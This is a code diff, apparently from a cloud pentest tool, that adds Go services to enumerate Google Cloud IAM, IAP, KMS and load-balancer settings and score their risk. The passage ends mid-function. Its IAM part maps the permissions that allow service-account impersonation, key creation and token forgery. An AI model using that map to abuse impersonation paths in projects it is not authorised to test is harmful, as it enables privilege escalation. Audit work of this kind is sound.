1f223b8e..2a1ba52f 100644 --- a/gcp/services/iamService/iamService.go +++ b/gcp/services/iamService/iamService.go @@ -104,6 +104,29 @@ type ServiceAccountInfo struct { CustomRoles []string `json:"customRoles"` HasHighPrivilege bool `json:"hasHighPrivilege"` HighPrivRoles []string `json:"highPrivRoles"` + // Pentest: Impersonation information + CanBeImpersonatedBy []string `json:"canBeImpersonatedBy"` // Principals who can impersonate this SA + CanCreateKeysBy []string `json:"canCreateKeysBy"` // Principals who can create keys for this SA + CanGetAccessTokenBy []string `json:"canGetAccessTokenBy"` // Principals with getAccessToken + CanSignBlobBy []string `json:"canSignBlobBy"` // Principals with signBlob + CanSignJwtBy []string `json:"canSignJwtBy"` // Principals with signJwt + HasImpersonationRisk bool `json:"hasImpersonationRisk"` // True if any impersonation path exists + ImpersonationRiskLevel string `json:"impersonationRiskLevel"` // CRITICAL, HIGH, MEDIUM, LOW +} + +// SAImpersonationInfo represents who can impersonate/abuse a service account +type SAImpersonationInfo struct { + ServiceAccount string `json:"serviceAccount"` + ProjectID string `json:"projectId"` + TokenCreators []string `json:"tokenCreators"` // iam.serviceAccounts.getAccessToken + KeyCreators []string `json:"keyCreators"` // iam.serviceAccountKeys.create + SignBlobUsers []string `json:"signBlobUsers"` // iam.serviceAccounts.signBlob + SignJwtUsers []string `json:"signJwtUsers"` // iam.serviceAccounts.signJwt + ImplicitDelegators []string `json:"implicitDelegators"` // iam.serviceAccounts.implicitDelegation + ActAsUsers []string `json:"actAsUsers"` // iam.serviceAccounts.actAs + SAAdmins []string `json:"saAdmins"` // iam.serviceAccounts.* (full admin) + RiskLevel string `json:"riskLevel"` + RiskReasons []string `json:"riskReasons"` } // ServiceAccountKeyInfo represents a service account key @@ -1215,3 +1238,215 @@ func (s *IAMService) GetAllEntityPermissionsWithGroupExpansion(projectID string) return expandedPerms, enrichedGroups, nil } + +// ============================================================================ +// PENTEST: Service Account Impersonation Analysis +// ============================================================================ + +// Dangerous permissions for SA impersonation/abuse +var saImpersonationPermissions = map[string]string{ + "iam.serviceAccounts.getAccessToken": "tokenCreator", + "iam.serviceAccountKeys.create": "keyCreator", + "iam.serviceAccounts.signBlob": "signBlob", + "iam.serviceAccounts.signJwt": "signJwt", + "iam.serviceAccounts.implicitDelegation": "implicitDelegation", + "iam.serviceAccounts.actAs": "actAs", +} + +// GetServiceAccountIAMPolicy gets the IAM policy for a specific service account +func (s *IAMService) GetServiceAccountIAMPolicy(ctx context.Context, saEmail string, projectID string) (*SAImpersonationInfo, error) { + var iamService *iam.Service + var err error + + if s.session != nil { + iamService, err = iam.NewService(ctx, s.session.GetClientOption()) + } else { + iamService, err = iam.NewService(ctx) + } + if err != nil { + return nil, fmt.Errorf("failed to create IAM service: %v", err) + } + + saResource := fmt.Sprintf("projects/%s/serviceAccounts/%s", projectID, saEmail) + + policy, err := iamService.Projects.ServiceAccounts.GetIamPolicy(saResource).Context(ctx).Do() + if err != nil { + return nil, fmt.Errorf("failed to get IAM policy for SA %s: %v", saEmail, err) + } + + info := &SAImpersonationInfo{ + ServiceAccount: saEmail, + ProjectID: projectID, + RiskReasons: []string{}, + } + + // Analyze each binding + for _, binding := range policy.Bindings { + role := binding.Role + members := binding.Members + + // Check for specific dangerous roles + switch role { + case "roles/iam.serviceAccountTokenCreator": + info.TokenCreators = append(info.TokenCreators, members...) + case "roles/iam.serviceAccountKeyAdmin": + info.KeyCreators = append(info.KeyCreators, members...) + info.SAAdmins = append(info.SAAdmins, members...) + case "roles/iam.serviceAccountAdmin": + info.SAAdmins = append(info.SAAdmins, members...) + info.TokenCreators = append(info.TokenCreators, members...) + info.KeyCreators = append(info.KeyCreators, members...) + case "roles/iam.serviceAccountUser": + info.ActAsUsers = append(info.ActAsUsers, members...) + case "roles/owner", "roles/editor": + // These grant broad SA access + info.SAAdmins = append(info.SAAdmins, members...) + } + } + + // Calculate risk level + info.RiskLevel, info.RiskReasons = calculateSAImpersonationRisk(info) + + return info, nil +} + +// GetAllServiceAccountImpersonation analyzes impersonation risks for all SAs in a project +func (s *IAMService) GetAllServiceAccountImpersonation(projectID string) ([]SAImpersonationInfo, error) { + ctx := context.Background() + + // Get all service accounts + serviceAccounts, err := s.ServiceAccounts(projectID) + if err != nil { + return nil, err + } + + var results []SAImpersonationInfo + + for _, sa := range serviceAccounts { + info, err := s.GetServiceAccountIAMPolicy(ctx, sa.Email, projectID) + if err != nil { + // Log but don't fail - we might not have permission + logger.InfoM(fmt.Sprintf("Could not get IAM policy for SA %s: %v", sa.Email, err), globals.GCP_IAM_MODULE_NAME) + continue + } + results = append(results, *info) + } + + return results, nil +} + +// ServiceAccountsWithImpersonation returns service accounts with impersonation analysis +func (s *IAMService) ServiceAccountsWithImpersonation(projectID string) ([]ServiceAccountInfo, error) { + ctx := context.Background() + + // Get base service account info + serviceAccounts, err := s.ServiceAccounts(projectID) + if err != nil { + return nil, err + } + + // Enrich with impersonation info + for i := range serviceAccounts { + sa := &serviceAccounts[i] + + info, err := s.GetServiceAccountIAMPolicy(ctx, sa.Email, projectID) + if err != nil { + // Log but continue + continue + } + + // Populate impersonation fields + sa.CanGetAccessTokenBy = info.TokenCreators + sa.CanCreateKeysBy = info.KeyCreators + sa.CanSignBlobBy = info.SignBlobUsers + sa.CanSignJwtBy = info.SignJwtUsers + + // Combine all impersonation paths + allImpersonators := make(map[string]bool) + for _, m := range info.TokenCreators { + allImpersonators[m] = true + } + for _, m := range info.KeyCreators { + allImpersonators[m] = true + } + for _, m := range info.SignBlobUsers { + allImpersonators[m] = true + } + for _, m := range info.SignJwtUsers { + allImpersonators[m] = true + } + for _, m := range info.SAAdmins { + allImpersonators[m] = true + } + + for m := range allImpersonators { + sa.CanBeImpersonatedBy = append(sa.CanBeImpersonatedBy, m) + } + + sa.HasImpersonationRisk = len(sa.CanBeImpersonatedBy) > 0 + sa.ImpersonationRiskLevel = info.RiskLevel + } + + return serviceAccounts, nil +} + +func calculateSAImpersonationRisk(info *SAImpersonationInfo) (string, []string) { + var reasons []string + score := 0 + + // Token creators are critical - direct impersonation + if len(info.TokenCreators) > 0 { + reasons = append(reasons, fmt.Sprintf("%d principal(s) can get access tokens (impersonate)", len(info.TokenCreators))) + score += 3 + + // Check for public access + for _, m := range info.TokenCreators { + if m == "allUsers" || m == "allAuthenticatedUsers" { + reasons = append(reasons, "PUBLIC can impersonate this SA!") + score += 5 + } + } + } + + // Key creators are critical - persistent access + if len(info.KeyCreators) > 0 { + reasons = append(reasons, fmt.Sprintf("%d principal(s) can create keys (persistent access)", len(info.KeyCreators))) + score += 3 + + for _, m := range info.KeyCreators { + if m == "allUsers" || m == "allAuthenticatedUsers" { + reasons = append(reasons, "PUBLIC can create keys for this SA!") + score += 5 + } + } + } + + // SignBlob/SignJwt - can forge tokens + if len(info.SignBlobUsers) > 0 || len(info.SignJwtUsers) > 0 { + reasons = append(reasons, "Principals can sign blobs/JWTs (token forgery)") + score += 2 + } + + // SA Admins + if len(info.SAAdmins) > 0 { + reasons = append(reasons, fmt.Sprintf("%d SA admin(s)", len(info.SAAdmins))) + score += 1 + } + + // ActAs users (needed for attaching SA to resources) + if len(info.ActAsUsers) > 0 { + reasons = append(reasons, fmt.Sprintf("%d principal(s) can actAs this SA", len(info.ActAsUsers))) + score += 1 + } + + if score >= 5 { + return "CRITICAL", reasons + } else if score >= 3 { + return "HIGH", reasons + } else if score >= 2 { + return "MEDIUM", reasons + } else if score >= 1 { + return "LOW", reasons + } + return "INFO", reasons +} diff --git a/gcp/services/iapService/iapService.go b/gcp/services/iapService/iapService.go new file mode 100644 index 00000000..8b63f914 --- /dev/null +++ b/gcp/services/iapService/iapService.go @@ -0,0 +1,286 @@ +package iapservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + iap "google.golang.org/api/iap/v1" +) + +type IAPService struct { + session *gcpinternal.SafeSession +} + +func New() *IAPService { + return &IAPService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *IAPService { + return &IAPService{session: session} +} + +// IAPSettingsInfo represents IAP settings for a resource +type IAPSettingsInfo struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + ResourceType string `json:"resourceType"` // compute, app-engine, etc. + ResourceName string `json:"resourceName"` + IAPEnabled bool `json:"iapEnabled"` + OAuth2ClientID string `json:"oauth2ClientId"` + OAuth2ClientSecretSha string `json:"oauth2ClientSecretSha"` + AccessDeniedPageURI string `json:"accessDeniedPageUri"` + CORSAllowedOrigins []string `json:"corsAllowedOrigins"` + GCIPTenantIDs []string `json:"gcipTenantIds"` + ReauthPolicy string `json:"reauthPolicy"` + RiskLevel string `json:"riskLevel"` + RiskReasons []string `json:"riskReasons"` +} + +// TunnelDestGroup represents an IAP tunnel destination group +type TunnelDestGroup struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + Region string `json:"region"` + CIDRs []string `json:"cidrs"` + FQDNs []string `json:"fqdns"` + RiskLevel string `json:"riskLevel"` + RiskReasons []string `json:"riskReasons"` +} + +// IAPBinding represents an IAM binding for IAP +type IAPBinding struct { + Resource string `json:"resource"` + ProjectID string `json:"projectId"` + Role string `json:"role"` + Members []string `json:"members"` + RiskLevel string `json:"riskLevel"` + RiskReasons []string `json:"riskReasons"` +} + +// ListTunnelDestGroups retrieves tunnel destination groups +func (s *IAPService) ListTunnelDestGroups(projectID string) ([]TunnelDestGroup, error) { + ctx := context.Background() + var service *iap.Service + var err error + + if s.session != nil { + service, err = iap.NewService(ctx, s.session.GetClientOption()) + } else { + service, err = iap.NewService(ctx) + } + if err != nil { + return nil, fmt.Errorf("failed to create IAP service: %v", err) + } + + var groups []TunnelDestGroup + + // List across common regions + regions := []string{"us-central1", "us-east1", "us-west1", "europe-west1", "asia-east1", "-"} + + for _, region := range regions { + parent := fmt.Sprintf("projects/%s/iap_tunnel/locations/%s", projectID, region) + resp, err := service.Projects.IapTunnel.Locations.DestGroups.List(parent).Context(ctx).Do() + if err != nil { + continue + } + + for _, group := range resp.TunnelDestGroups { + info := TunnelDestGroup{ + Name: extractName(group.Name), + ProjectID: projectID, + Region: region, + CIDRs: group.Cidrs, + FQDNs: group.Fqdns, + RiskReasons: []string{}, + } + info.RiskLevel, info.RiskReasons = s.analyzeDestGroupRisk(info) + groups = append(groups, info) + } + } + + return groups, nil +} + +// GetIAPSettings retrieves IAP settings for a resource +func (s *IAPService) GetIAPSettings(projectID, resourcePath string) (*IAPSettingsInfo, error) { + ctx := context.Background() + var service *iap.Service + var err error + + if s.session != nil { + service, err = iap.NewService(ctx, s.session.GetClientOption()) + } else { + service, err = iap.NewService(ctx) + } + if err != nil { + return nil, fmt.Errorf("failed to create IAP service: %v", err) + } + + settings, err := service.V1.GetIapSettings(resourcePath).Context(ctx).Do() + if err != nil { + return nil, fmt.Errorf("failed to get IAP settings: %v", err) + } + + info := &IAPSettingsInfo{ + Name: settings.Name, + ProjectID: projectID, + ResourceName: resourcePath, + RiskReasons: []string{}, + } + + if settings.AccessSettings != nil { + if settings.AccessSettings.OauthSettings != nil { + info.OAuth2ClientID = settings.AccessSettings.OauthSettings.LoginHint + } + // CorsSettings doesn't have AllowHttpOptions as a list - it's a bool + // Skip CORS parsing for now + if settings.AccessSettings.GcipSettings != nil { + info.GCIPTenantIDs = settings.AccessSettings.GcipSettings.TenantIds + } + if settings.AccessSettings.ReauthSettings != nil { + info.ReauthPolicy = settings.AccessSettings.ReauthSettings.Method + } + } + + info.RiskLevel, info.RiskReasons = s.analyzeSettingsRisk(*info) + + return info, nil +} + +// GetIAPBindings retrieves IAM bindings for an IAP-protected resource +func (s *IAPService) GetIAPBindings(projectID, resourcePath string) ([]IAPBinding, error) { + ctx := context.Background() + var service *iap.Service + var err error + + if s.session != nil { + service, err = iap.NewService(ctx, s.session.GetClientOption()) + } else { + service, err = iap.NewService(ctx) + } + if err != nil { + return nil, fmt.Errorf("failed to create IAP service: %v", err) + } + + policy, err := service.V1.GetIamPolicy(resourcePath, &iap.GetIamPolicyRequest{}).Context(ctx).Do() + if err != nil { + return nil, fmt.Errorf("failed to get IAP IAM policy: %v", err) + } + + var bindings []IAPBinding + for _, binding := range policy.Bindings { + info := IAPBinding{ + Resource: resourcePath, + ProjectID: projectID, + Role: binding.Role, + Members: binding.Members, + RiskReasons: []string{}, + } + info.RiskLevel, info.RiskReasons = s.analyzeBindingRisk(info) + bindings = append(bindings, info) + } + + return bindings, nil +} + +func (s *IAPService) analyzeDestGroupRisk(group TunnelDestGroup) (string, []string) { + var reasons []string + score := 0 + + // Wide CIDR ranges + for _, cidr := range group.CIDRs { + if cidr == "0.0.0.0/0" || cidr == "::/0" { + reasons = append(reasons, "Allows tunneling to any IP (0.0.0.0/0)") + score += 3 + break + } + // Check for /8 or larger + if strings.HasSuffix(cidr, "/8") || strings.HasSuffix(cidr, "/0") { + reasons = append(reasons, fmt.Sprintf("Very broad CIDR range: %s", cidr)) + score += 2 + } + } + + // Many FQDNs + if len(group.FQDNs) > 10 { + reasons = append(reasons, fmt.Sprintf("Large number of FQDNs: %d", len(group.FQDNs))) + score += 1 + } + + if score >= 3 { + return "HIGH", reasons + } else if score >= 2 { + return "MEDIUM", reasons + } else if score >= 1 { + return "LOW", reasons + } + return "INFO", reasons +} + +func (s *IAPService) analyzeSettingsRisk(settings IAPSettingsInfo) (string, []string) { + var reasons []string + score := 0 + + // No reauth policy + if settings.ReauthPolicy == "" || settings.ReauthPolicy == "DISABLED" { + reasons = append(reasons, "No reauthentication policy configured") + score += 1 + } + + // Wide CORS + for _, origin := range settings.CORSAllowedOrigins { + if origin == "*" { + reasons = append(reasons, "CORS allows all origins") + score += 2 + break + } + } + + if score >= 2 { + return "MEDIUM", reasons + } else if score >= 1 { + return "LOW", reasons + } + return "INFO", reasons +} + +func (s *IAPService) analyzeBindingRisk(binding IAPBinding) (string, []string) { + var reasons []string + score := 0 + + // Check for public access + for _, member := range binding.Members { + if member == "allUsers" { + reasons = append(reasons, "IAP resource allows allUsers") + score += 3 + } else if member == "allAuthenticatedUsers" { + reasons = append(reasons, "IAP resource allows allAuthenticatedUsers") + score += 2 + } + } + + // Sensitive roles + if strings.Contains(binding.Role, "admin") || strings.Contains(binding.Role, "Admin") { + reasons = append(reasons, fmt.Sprintf("Admin role granted: %s", binding.Role)) + score += 1 + } + + if score >= 3 { + return "HIGH", reasons + } else if score >= 2 { + return "MEDIUM", reasons + } else if score >= 1 { + return "LOW", reasons + } + return "INFO", reasons +} + +func extractName(fullPath string) string { + parts := strings.Split(fullPath, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullPath +} diff --git a/gcp/services/kmsService/kmsService.go b/gcp/services/kmsService/kmsService.go new file mode 100644 index 00000000..4f8d7a15 --- /dev/null +++ b/gcp/services/kmsService/kmsService.go @@ -0,0 +1,283 @@ +package kmsservice + +import ( + "context" + "fmt" + "strings" + + kms "google.golang.org/api/cloudkms/v1" +) + +type KMSService struct{} + +func New() *KMSService { + return &KMSService{} +} + +// KeyRingInfo holds KMS key ring details +type KeyRingInfo struct { + Name string + ProjectID string + Location string + CreateTime string + + // Keys in this key ring + KeyCount int +} + +// CryptoKeyInfo holds KMS crypto key details with security-relevant information +type CryptoKeyInfo struct { + Name string + ProjectID string + Location string + KeyRing string + Purpose string // ENCRYPT_DECRYPT, ASYMMETRIC_SIGN, ASYMMETRIC_DECRYPT, MAC + CreateTime string + + // Version info + PrimaryVersion string + PrimaryState string + VersionCount int + + // Security configuration + RotationPeriod string + NextRotationTime string + DestroyScheduledDuration string + ProtectionLevel string // SOFTWARE, HSM, EXTERNAL, EXTERNAL_VPC + + // Import info (indicates external key import) + ImportOnly bool + + // Labels + Labels map[string]string + + // IAM + EncrypterMembers []string + DecrypterMembers []string + AdminMembers []string + IsPublicEncrypt bool + IsPublicDecrypt bool +} + +// KeyRings retrieves all KMS key rings in a project +func (ks *KMSService) KeyRings(projectID string) ([]KeyRingInfo, error) { + ctx := context.Background() + + service, err := kms.NewService(ctx) + if err != nil { + return nil, fmt.Errorf("failed to create KMS service: %v", err) + } + + var keyRings []KeyRingInfo + + // List key rings across all locations + parent := fmt.Sprintf("projects/%s/locations/-", projectID) + + call := service.Projects.Locations.KeyRings.List(parent) + err = call.Pages(ctx, func(page *kms.ListKeyRingsResponse) error { + for _, kr := range page.KeyRings { + info := parseKeyRingInfo(kr, projectID) + + // Get key count for this key ring + keyCount, _ := ks.getKeyCount(service, kr.Name) + info.KeyCount = keyCount + + keyRings = append(keyRings, info) + } + return nil + }) + + if err != nil { + return nil, fmt.Errorf("failed to list key rings: %v", err) + } + + return keyRings, nil +} + +// CryptoKeys retrieves all crypto keys in a project +func (ks *KMSService) CryptoKeys(projectID string) ([]CryptoKeyInfo, error) { + ctx := context.Background() + + service, err := kms.NewService(ctx) + if err != nil { + return nil, fmt.Errorf("failed to create KMS service: %v", err) + } + + var keys []CryptoKeyInfo + + // First get all key rings + keyRings, err := ks.KeyRings(projectID) + if err != nil { + return nil, err + } + + // Then get keys from each key ring + for _, kr := range keyRings { + keyRingName := fmt.Sprintf("projects/%s/locations/%s/keyRings/%s", projectID, kr.Location, kr.Name) + + call := service.Projects.Locations.KeyRings.CryptoKeys.List(keyRingName) + err = call.Pages(ctx, func(page *kms.ListCryptoKeysResponse) error { + for _, key := range page.CryptoKeys { + info := parseCryptoKeyInfo(key, projectID, kr.Location, kr.Name) + + // Try to get IAM policy + iamPolicy, iamErr := ks.getKeyIAMPolicy(service, key.Name) + if iamErr == nil && iamPolicy != nil { + info.EncrypterMembers, info.DecrypterMembers, info.AdminMembers, + info.IsPublicEncrypt, info.IsPublicDecrypt = parseKeyBindings(iamPolicy) + } + + keys = append(keys, info) + } + return nil + }) + + if err != nil { + // Continue with other key rings even if one fails + continue + } + } + + return keys, nil +} + +// parseKeyRingInfo extracts relevant information from a KMS key ring +func parseKeyRingInfo(kr *kms.KeyRing, projectID string) KeyRingInfo { + info := KeyRingInfo{ + Name: extractName(kr.Name), + ProjectID: projectID, + CreateTime: kr.CreateTime, + } + + // Extract location from key ring name + // Format: projects/{project}/locations/{location}/keyRings/{keyRing} + parts := strings.Split(kr.Name, "/") + if len(parts) >= 4 { + info.Location = parts[3] + } + + return info +} + +// parseCryptoKeyInfo extracts relevant information from a KMS crypto key +func parseCryptoKeyInfo(key *kms.CryptoKey, projectID, location, keyRing string) CryptoKeyInfo { + info := CryptoKeyInfo{ + Name: extractName(key.Name), + ProjectID: projectID, + Location: location, + KeyRing: keyRing, + Purpose: key.Purpose, + CreateTime: key.CreateTime, + Labels: key.Labels, + ImportOnly: key.ImportOnly, + } + + // Rotation configuration + if key.RotationPeriod != "" { + info.RotationPeriod = key.RotationPeriod + } + if key.NextRotationTime != "" { + info.NextRotationTime = key.NextRotationTime + } + + // Destroy scheduled duration + if key.DestroyScheduledDuration != "" { + info.DestroyScheduledDuration = key.DestroyScheduledDuration + } + + // Primary version info + if key.Primary != nil { + info.PrimaryVersion = extractVersionNumber(key.Primary.Name) + info.PrimaryState = key.Primary.State + info.ProtectionLevel = key.Primary.ProtectionLevel + } + + // Version template for protection level + if info.ProtectionLevel == "" && key.VersionTemplate != nil { + info.ProtectionLevel = key.VersionTemplate.ProtectionLevel + } + + return info +} + +// getKeyCount gets the number of crypto keys in a key ring +func (ks *KMSService) getKeyCount(service *kms.Service, keyRingName string) (int, error) { + ctx := context.Background() + count := 0 + + call := service.Projects.Locations.KeyRings.CryptoKeys.List(keyRingName) + err := call.Pages(ctx, func(page *kms.ListCryptoKeysResponse) error { + count += len(page.CryptoKeys) + return nil + }) + + if err != nil { + return 0, err + } + + return count, nil +} + +// getKeyIAMPolicy retrieves the IAM policy for a crypto key +func (ks *KMSService) getKeyIAMPolicy(service *kms.Service, keyName string) (*kms.Policy, error) { + ctx := context.Background() + + policy, err := service.Projects.Locations.KeyRings.CryptoKeys.GetIamPolicy(keyName).Context(ctx).Do() + if err != nil { + return nil, err + } + + return policy, nil +} + +// parseKeyBindings extracts who has key permissions and checks for public access +func parseKeyBindings(policy *kms.Policy) (encrypters []string, decrypters []string, admins []string, publicEncrypt bool, publicDecrypt bool) { + for _, binding := range policy.Bindings { + switch binding.Role { + case "roles/cloudkms.cryptoKeyEncrypter": + encrypters = append(encrypters, binding.Members...) + for _, member := range binding.Members { + if member == "allUsers" || member == "allAuthenticatedUsers" { + publicEncrypt = true + } + } + case "roles/cloudkms.cryptoKeyDecrypter": + decrypters = append(decrypters, binding.Members...) + for _, member := range binding.Members { + if member == "allUsers" || member == "allAuthenticatedUsers" { + publicDecrypt = true + } + } + case "roles/cloudkms.cryptoKeyEncrypterDecrypter": + encrypters = append(encrypters, binding.Members...) + decrypters = append(decrypters, binding.Members...) + for _, member := range binding.Members { + if member == "allUsers" || member == "allAuthenticatedUsers" { + publicEncrypt = true + publicDecrypt = true + } + } + case "roles/cloudkms.admin": + admins = append(admins, binding.Members...) + } + } + return +} + +// extractName extracts just the resource name from the full resource name +func extractName(fullName string) string { + parts := strings.Split(fullName, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullName +} + +// extractVersionNumber extracts the version number from a crypto key version name +func extractVersionNumber(versionName string) string { + parts := strings.Split(versionName, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return versionName +} diff --git a/gcp/services/loadbalancerService/loadbalancerService.go b/gcp/services/loadbalancerService/loadbalancerService.go new file mode 100644 index 00000000..b498611f --- /dev/null +++ b/gcp/services/loadbalancerService/loadbalancerService.go @@ -0,0 +1,375 @@ +package loadbalancerservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + compute "google.golang.org/api/compute/v1" +) + +type LoadBalancerService struct { + session *gcpinternal.SafeSession +} + +func New() *LoadBalancerService { + return &LoadBalancerService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *LoadBalancerService { + return &LoadBalancerService{session: session} +} + +// LoadBalancerInfo represents a load balancer configuration +type LoadBalancerInfo struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + Type string `json:"type"` // HTTP, HTTPS, TCP, SSL, UDP, INTERNAL + Scheme string `json:"scheme"` // EXTERNAL, INTERNAL + Region string `json:"region"` // global or regional + IPAddress string `json:"ipAddress"` + Port string `json:"port"` + Protocol string `json:"protocol"` + + // Backend info + BackendServices []string `json:"backendServices"` + BackendBuckets []string `json:"backendBuckets"` + HealthChecks []string `json:"healthChecks"` + + // SSL/TLS config + SSLPolicy string `json:"sslPolicy"` + SSLCertificates []string `json:"sslCertificates"` + MinTLSVersion string `json:"minTlsVersion"` + + // Security config + SecurityPolicy string `json:"securityPolicy"` // Cloud Armor + + // Security analysis + RiskLevel string `json:"riskLevel"` + RiskReasons []string `json:"riskReasons"` +} + +// SSLPolicyInfo represents an SSL policy +type SSLPolicyInfo struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + MinTLSVersion string `json:"minTlsVersion"` + Profile string `json:"profile"` // COMPATIBLE, MODERN, RESTRICTED, CUSTOM + CustomFeatures []string `json:"customFeatures"` + RiskLevel string `json:"riskLevel"` + RiskReasons []string `json:"riskReasons"` +} + +// BackendServiceInfo represents a backend service +type BackendServiceInfo struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + Protocol string `json:"protocol"` + Port int64 `json:"port"` + HealthCheck string `json:"healthCheck"` + SecurityPolicy string `json:"securityPolicy"` + EnableCDN bool `json:"enableCdn"` + SessionAffinity string `json:"sessionAffinity"` + ConnectionDraining int64 `json:"connectionDraining"` + Backends []string `json:"backends"` + RiskLevel string `json:"riskLevel"` + RiskReasons []string `json:"riskReasons"` +} + +// ListLoadBalancers retrieves all load balancers in a project +func (s *LoadBalancerService) ListLoadBalancers(projectID string) ([]LoadBalancerInfo, error) { + ctx := context.Background() + var service *compute.Service + var err error + + if s.session != nil { + service, err = compute.NewService(ctx, s.session.GetClientOption()) + } else { + service, err = compute.NewService(ctx) + } + if err != nil { + return nil, fmt.Errorf("failed to create Compute service: %v", err) + } + + var loadBalancers []LoadBalancerInfo + + // Get global forwarding rules (external HTTP(S), SSL Proxy, TCP Proxy) + globalFwdRules, err := service.GlobalForwardingRules.List(projectID).Context(ctx).Do() + if err == nil { + for _, rule := range globalFwdRules.Items { + lb := s.parseForwardingRule(rule, projectID, "global") + loadBalancers = append(loadBalancers, lb) + } + } + + // Get regional forwarding rules (internal, network LB) + regionsResp, err := service.Regions.List(projectID).Context(ctx).Do() + if err == nil { + for _, region := range regionsResp.Items { + regionalRules, err := service.ForwardingRules.List(projectID, region.Name).Context(ctx).Do() + if err == nil { + for _, rule := range regionalRules.Items { + lb := s.parseForwardingRule(rule, projectID, region.Name) + loadBalancers = append(loadBalancers, lb) + } + } + } + } + + return loadBalancers, nil +} + +// ListSSLPolicies retrieves all SSL policies +func (s *LoadBalancerService) ListSSLPolicies(projectID string) ([]SSLPolicyInfo, error) { + ctx := context.Background() + var service *compute.Service + var err error + + if s.session != nil { + service, err = compute.NewService(ctx, s.session.GetClientOption()) + } else { + service, err = compute.NewService(ctx) + } + if err != nil { + return nil, fmt.Errorf("failed to create Compute service: %v", err) + } + + var policies []SSLPolicyInfo + + resp, err := service.SslPolicies.List(projectID).Context(ctx).Do() + if err != nil { + return nil, fmt.Errorf("failed to list SSL policies: %v", err) + } + + for _, policy := range resp.Items { + info := SSLPolicyInfo{ + Name: policy.Name, + ProjectID: projectID, + MinTLSVersion: policy.MinTlsVersion, + Profile: policy.Profile, + CustomFeatures: policy.CustomFeatures, + RiskReasons: []string{}, + } + info.RiskLevel, info.RiskReasons = s.analyzeSSLPolicyRisk(info) + policies = append(policies, info) + } + + return policies, nil +} + +// ListBackendServices retrieves all backend services +func (s *LoadBalancerService) ListBackendServices(projectID string) ([]BackendServiceInfo, error) { + ctx := context.Background() + var service *compute.Service + var err error + + if s.session != nil { + service, err = compute.NewService(ctx, s.session.GetClientOption()) + } else { + service, err = compute.NewService(ctx) + } + if err != nil { + return nil, fmt.Errorf("failed to create Compute service: %v", err) + } + + var backends []BackendServiceInfo + + // Global backend services + globalBackends, err := service.BackendServices.List(projectID).Context(ctx).Do() + if err == nil { + for _, backend := range globalBackends.Items { + info := s.parseBackendService(backend, projectID) + backends = append(backends, info) + } + } + + // Regional backend services + regionsResp, err := service.Regions.List(projectID).Context(ctx).Do() + if err == nil { + for _, region := range regionsResp.Items { + regionalBackends, err := service.RegionBackendServices.List(projectID, region.Name).Context(ctx).Do() + if err == nil { + for _, backend := range regionalBackends.Items { + info := s.parseRegionalBackendService(backend, projectID, region.Name) + backends = append(backends, info) + } + } + } + } + + return backends, nil +} + +func (s *LoadBalancerService) parseForwardingRule(rule *compute.ForwardingRule, projectID, region string) LoadBalancerInfo { + info := LoadBalancerInfo{ + Name: rule.Name, + ProjectID: projectID, + Region: region, + IPAddress: rule.IPAddress, + Port: rule.PortRange, + Protocol: rule.IPProtocol, + RiskReasons: []string{}, + } + + // Determine load balancer type + if rule.LoadBalancingScheme == "EXTERNAL" || rule.LoadBalancingScheme == "EXTERNAL_MANAGED" { + info.Scheme = "EXTERNAL" + } else { + info.Scheme = "INTERNAL" + } + + // Determine type based on target + if rule.Target != "" { + if strings.Contains(rule.Target, "targetHttpProxies") { + info.Type = "HTTP" + } else if strings.Contains(rule.Target, "targetHttpsProxies") { + info.Type = "HTTPS" + } else if strings.Contains(rule.Target, "targetSslProxies") { + info.Type = "SSL_PROXY" + } else if strings.Contains(rule.Target, "targetTcpProxies") { + info.Type = "TCP_PROXY" + } else if strings.Contains(rule.Target, "targetPools") { + info.Type = "NETWORK" + } else if strings.Contains(rule.Target, "targetGrpcProxies") { + info.Type = "GRPC" + } + } else if rule.BackendService != "" { + info.Type = "INTERNAL" + info.BackendServices = []string{extractName(rule.BackendService)} + } + + info.RiskLevel, info.RiskReasons = s.analyzeLoadBalancerRisk(info) + + return info +} + +func (s *LoadBalancerService) parseBackendService(backend *compute.BackendService, projectID string) BackendServiceInfo { + info := BackendServiceInfo{ + Name: backend.Name, + ProjectID: projectID, + Protocol: backend.Protocol, + Port: backend.Port, + EnableCDN: backend.EnableCDN, + SessionAffinity: backend.SessionAffinity, + RiskReasons: []string{}, + } + + if backend.SecurityPolicy != "" { + info.SecurityPolicy = extractName(backend.SecurityPolicy) + } + + if len(backend.HealthChecks) > 0 { + info.HealthCheck = extractName(backend.HealthChecks[0]) + } + + if backend.ConnectionDraining != nil { + info.ConnectionDraining = backend.ConnectionDraining.DrainingTimeoutSec + } + + for _, be := range backend.Backends { + info.Backends = append(info.Backends, extractName(be.Group)) + } + + info.RiskLevel, info.RiskReasons = s.analyzeBackendServiceRisk(info) + + return info +} + +func (s *LoadBalancerService) parseRegionalBackendService(backend *compute.BackendService, projectID, region string) BackendServiceInfo { + info := s.parseBackendService(backend, projectID) + return info +} + +func (s *LoadBalancerService) analyzeLoadBalancerRisk(lb LoadBalancerInfo) (string, []string) { + var reasons []string + score := 0 + + // External load balancer + if lb.Scheme == "EXTERNAL" { + reasons = append(reasons, "External-facing load balancer") + score += 1 + } + + // No SSL for external + if lb.Scheme == "EXTERNAL" && lb.Type != "HTTPS" && lb.Type != "SSL_PROXY" { + reasons = append(reasons, "External LB without HTTPS/SSL") + score += 2 + } + + // Check for weak SSL policy would require additional lookup + if lb.SSLPolicy == "" && (lb.Type == "HTTPS" || lb.Type == "SSL_PROXY") { + reasons = append(reasons, "No custom SSL policy (using default)") + score += 1 + } + + if score >= 3 { + return "HIGH", reasons + } else if score >= 2 { + return "MEDIUM", reasons + } else if score >= 1 { + return "LOW", reasons + } + return "INFO", reasons +} + +func (s *LoadBalancerService) analyzeSSLPolicyRisk(policy SSLPolicyInfo) (string, []string) { + var reasons []string + score := 0 + + 